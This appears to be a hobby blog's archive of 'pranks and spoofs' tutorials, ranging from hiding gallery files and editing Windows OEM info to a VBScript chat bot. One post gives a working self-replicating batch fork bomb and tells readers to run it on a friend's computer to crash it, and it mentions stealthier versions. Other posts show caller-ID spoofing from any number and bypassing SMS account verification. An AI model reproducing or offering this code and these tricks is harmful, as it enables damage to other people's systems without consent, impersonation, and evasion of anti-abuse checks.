Showing posts with label Pranks and spoofs. Show all posts
Hide files from Android Gallery
If you want to hide media items from your android gallery without using any suspicious applications,you can simply follow this tutorial.
.nomedia method:
- All you would need is a good file manager.I would personally suggest using x-plore its a very good file manager
- open xplore and create a new text file
- remove the .txt extension and create a bare file with ".nomedia"extension remember leave it name less,but just with an extension
- now when it opens the editor just put in a dot,nothing else and save the file
- And now which ever directory contains this file will not be indexed in your android gallery.you can copy it and use for multiple directories,leaving it in your root sd card mount will prevent any media from being read by your device.
- once you've created this file,you can use it to hide multiple directories or even all the media files from your sd card at a shot
the "." :
in case you quickly want to hide a directory and don't have the above said .nomedia file,you can simply put a "." before the name of the directory and vola!its hidden from the gallery
Friday, 14 February 2014
Posted by Unknown
Bypass SMS verification
Due to obvious reasons,now a days many sites like google,facebook etc started prompting for an sms verification when you create an account.and even many ad companies target sms ads to your mobile when you tie up your number with some other vague sites.so today lets see how we can bypass the sms verification step yet still continue with your registration.
- Its a very simple trick!just visit the site Receive-Sms-Online
- Select one of the 4 numbers,give that number as yours when asked by any site you wanna register for
- And open the inbox of that number,and you shall have your verification code
Tuesday, 14 January 2014
Posted by Unknown
Hack Windows OEM Information
OEM its the abbreviation for Original Equipment Manufacturer . OEM Information is used by the manufacturers of your laptop or pc to display their company logo,system model etc in your system properties like in the above image ( though it is a modified one ).so we are gonna tweak this OEM Info to show our desired values and logo,like in the above image.
- First open windows registry editor.you can do it by typing "regedit" in run or even search for it in windows search
- Just create a backup of your registry,in case you screw it up,
- goto file menu,select export and then give it a name,select back up all and hit save
- Now navigate to the following reg key value
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation
- There add new string value by right clicking on the empty pane
- You need to create the following string values
Manufacturer
Model
SupportPhone
SupportHours
Website
Logo
- Incase they are already present,you can just modify them.
- Now right click on the string and modify its value
- Repeat this for all the strings,i think the string names are self explanatory,
- and now for the logo,you would need a 120X120 bmp image,you can convert your selected image into bmp and specified resolution using this Online converter
- Now copy your generated bmp image to folowing location
C:\Windows\System32\oobe\
- Now edit the logo value to the path specified and then you image name with a .bmp extension
- Now restart your computer and there you go!your own customized OEM Info.
Friday, 16 August 2013
Posted by Unknown
Hack windows 7 Experience Index
Windows Experience Index!one of the best scales to compare between computers running windows.if you don't know what it is yet,you can just check it out by right clicking on My computer -> system properties.there you would see the Windows Experience Index.
what basically those numbers mean is,how good your computer is on a scale of 1 to 7.9 the over all experience index is given by the least index of various assessments like the processor,RAM,Hard disk data transfer rate etc.Ever felt like want to boost up those numbers?may be even to brag about your computer with your friends or something?yes it can be done,very easily.so lets get started!
- First just check out the windows experience report of your system,here is mine
yup minez got a poor graphics performance for the record :P
- So what we will do is,just search for the file where windows stores this data,i mean these scores,tinker it to our desired values and make windows believe that these are the scores obtained from the previous assessment
- First go to the following location
C:\Windows\Performance\WinSAT\DataStore
- there you will see a number of xml files.what you can do is sort them in accordance with date as you need to change the latest report
- mine contains only one set of file,as you can see all of them start with the same date,i've cleared the old ones.yours might have many,you need to find the recent set
- we need to edit that report which has Formal.Assesment in its name.open it with notepad
- now search for <WinSPR> it lies quit close to the begining of the file if you can just scroll a bit or you can us find option (cntrl+F)
- now our scores lie between tags,an opening pair and a closing pair i you are not familiar with xml,
- The value between <SystemScore> and </SystemScore> is the overall Experience index value.you can see in the below image that i've changed it to 7.9 instead of 4.6
- Similarly you can change other scores as well
<MemoryScore> - for ram
<CpuScore> - for processor rating
<GraphicsScore> - for graphics rating
<GamingScore> - for gaming graphics
<DiskScore> - for Primary hard disk score
- After changing them,goto file,click save as and save this file with a .xml extension (Donot change the name! ) and the file type as all files in some other location take desktop.
- now copy the saved file from desktop and paste it in
C:\Windows\Performance\WinSAT\DataStore
Thursday, 15 August 2013
Posted by Unknown
Make your own Fb chat bot
Ever felt like " godd i wish some one could do the chatting behalf of me!" may the case be a boring person or even to use a fake account yes there is a way,and itz got a lot of potential you can use it for simple purposes like chatting or for more useful and complicated task automations.ok lets get started..
for this we are going to use the WshShell object of windows script host.dont worry if you are not that familiar with it,just stay with me.
- First copy the below code and pate it in your note pad.then click on save as and name it "bot.vbs" and don't forget to change the file type to "all files"
set kc = WScript.CreateObject("WScript.Shell")
WScript.Sleep 9000
kc.SendKeys "hello {:}{)} "
WScript.Sleep 2000
kc.SendKeys "{ENTER}"
WScript.Sleep 7000
kc.SendKeys "how are you?"
WScript.Sleep 2000
kc.SendKeys "{ENTER}"
WScript.Sleep 7000
kc.SendKeys "i{'}m fine{,}thank you {:}D"
WScript.Sleep 2000
kc.SendKeys "{ENTER}"
WScript.Sleep 7000
kc.SendKeys "wassup?"
WScript.Sleep 2000
kc.SendKeys "{ENTER}"
WScript.Sleep 7000
kc.SendKeys "where do you live{?}"
WScript.Sleep 2000
kc.SendKeys "{ENTER}"
WScript.Sleep 7000
kc.SendKeys "oh{,}i{'}m from india"
WScript.Sleep 2000
kc.SendKeys "{ENTER}"
WScript.Sleep 7000
kc.SendKeys "ok{,}bye for now {:}D"
WScript.Sleep 2000
kc.SendKeys "{ENTER}"
- I know its a little bit clumsy,but i'll explain it.ok now all you have to do is double click on the file,and then navigate to your browser and click on the chat box of the person with whom you want your bot to chat.
Explanation:
- The above code is a bit lengthy,so let me take a small piece of code for the purpose of explanation,we'll get back to the original code later.
set kc = WScript.CreateObject("WScript.Shell")
WScript.Sleep 100
kc.Run "notepad.exe"
WScript.Sleep 100
kc.AppActivate "notepad"
WScript.Sleep 1000
kc.SendKeys "hello everyone {!} "
ok,here it goes,
- set kc = WScript.CreateObject("WScript.Shell") - this line is used to create an object of "WScript shell" with a reference name "kc" you can use any name of your desire,but make sure you stick to the name through out the code.
- WScript.Sleep 100 - this is to give a delay off 100 milli seconds,or you can simply say execute the next line of code after 100 milli seconds.and the time shall always be given in terms of milli seconds.1second = 1000 milli seconds.so if you want to give a pause of 3 seconds you must write
- kc.Run "notepad.exe" - this is to start a new notepad you can use this line to start any application
eg: kc.Run "calc" - for calculator
kc.Run "taskmgr" - for task manager
kc.Run "cmd" - for command prompt
here we started a notepad because,we want to test whether our script is working well or not
- kc.AppActivate "notepad" - to make notepad the active window,its simply like clicking on the notepad for the editing cursor to appear
- kc.SendKeys "hello everyone{!}" - to send the keys "hello everyone!" it is like typing the string "hello everyone!" through your keyboard this is the main concept we use in our chat bot.and you must have noticed that the ! mark has been wrapped with two flower brackets or what ever you call them,it is because,special symbols(anything except a-z and 0-9 ) must be in those brackets.and here is a list of other keyboard keys you could use
backspace {BACKSPACE}
enter {ENTER}
escape {ESC}
tab {TAB}
ok now lets just look into our previous code,does it make sense now?i suggest you guys to go through the code once again with the acquired knowledge and try to interpret it,or you can continue reading,
- in the code we did not call up the node pad application,it is because we want the chat bot to enter text into the chat box of our Facebook friend,but not into note pad.
- in the second line,we gave a delay of 9 seconds,it is because in the mean time you could open up your browser and click on the chat (the place where you enter the text).you can even increase the delay if you want,but make sure you you do it within the time
- and after entering the text,we gave a delay of 2 seconds it is because,to make the other person feel like we are typing,you know Facebook shows that " xxxxxx is typing......." thing
- and then after sending the text,we waited for 7 seconds,so that the other person can give a reply.
- to stop it from executing,you have to close the wscript window opened
- You can change the text to what ever you want but remember it is case sensitive and special characters must be enclosed in {},go play with it!
Sunday, 4 August 2013
Posted by Unknown
Fatal bats1
ya,kind of cathy name ;) today we will see a method to clog up peoples ram,crunch the hard disk space and leave their system completely useless untill their next format.
first let me just show you the code and then i'lll start explaining it.
@echo off
:loop
set /a x = %random%
type firstnode.bat >> %x%.bat
start %x%.bat
goto loop
- open up a notepad,copy the above code and paste it in it.
- click save as,and thengive it a name "firstnode.bat" [do not use any other name]
- change the file type to all files,click save.
ok,lets discuss the code.basically *.bat is an extension which allows you to run CMD or command prompt instructions.
- @echo off : this peice here instructs to turn off the display of current directory evry time it runs.
- :loop this indicates that a loop with reference"loop"is starting from here
- set /a x = %random% this sets a random number into variable x
- type firstnode.bat >> %x%.bat this line makes a copy of the contents of the file "firstnode.bat" and wirtes them to a file named after the random number returned from random with a bat extension
- start %x%.bat it starts or calls the file created in the previous step,and that file starts running independently.
- goto loop this says to go back to the step "loop" and start executing again.
so totally what the code does is,first it creates a copy of itself,then calls it and from then,both of them create individual copies of themselves (total of 4 up to now) and the cycle continues until the ram has no more memory to allocate and crashes or even the hard disk may run out of disk space and crash.
it grows in an exponential manner,ie., for every n itiration,2^n files are created and are running,that goes like1,2,4,8....... by the time just about 10-20 itirations are performed,system crashes it takes just about 30 to 40 seconds to crash any system.
Executing it:
Never ever try this on your own system!!
- copy this file to a pendrive,
- take it to your friends system,copy the file into another drive like d: or f: or even desktop,then double click it.(don't execute it directly from the pendrive)
And you can take a look at our attatchments section or our fatal bats series to make this process entirely autonomous and stealthy and take it to the next level :)
you can watch the below video in which i've used a xp virtual machine to run the bat and you can see the consequences.in the video. i've run the batch on the desktop,oh dat poor guy ;)
Cleaning up the mess:
- To stop it,simply reboot the system manually, ( unplug it! ) and then restart your system.the go to the folder in which you've executed the previous file,in my case,its the desktop itself.
- Now create another file with name "clean.bat" and enter the following code
del *.bat
- And execute it. thats it,you are done,but be careful,do not open up any of the previously created files or else you must suffer once again!
TIP: After creating clean.bat,sort the files by modified and descending to get to it quickly,or else just use the search to locate it.
Thursday, 1 August 2013
Posted by Unknown
Make a prank call from any number
You can make calls from any ones number you like,yes you've read it right.!from any number.you can also use fancy numbers like 9999999999 etc etc.
- First visit Crazy call,then fill in the below form
- Select your country,then in the second text box,enter the Caller id you want to display i.e.,the number which you want to be displayed to the other person
- Then enter the number you want to call, i.e.,the number of the person whom you want to make a call to.
- You can even change the pitch of your voice.
Normal-your voice
Low pitch-male voice
High pitch-female voice
- Then click on"Get me a code"
- Then on the right hand side of the page,a small window appears which looks similar to the below image:
- Now make a call to one of the above displayed numbers and enter the code given to you when asked.
Eg:
in the above case,
Make a call to 00994502663320 and when asked for code,enter 39043 and there you go,you will be making a prank call.
Note: International call charges may apply.so make sure that you use this service only when you need it the most.For instance, from India about 30/- is charged for 2 minutes.
Status update Posted Via "magical devices" trick
Post your Facebook status from different devices.To do that visit http://postedvia.com/.
- Select your device by clicking on the Select the delivery method Drop down,




.jpg)



.jpg)
.jpg)

.jpg)
.jpg)
.jpg)














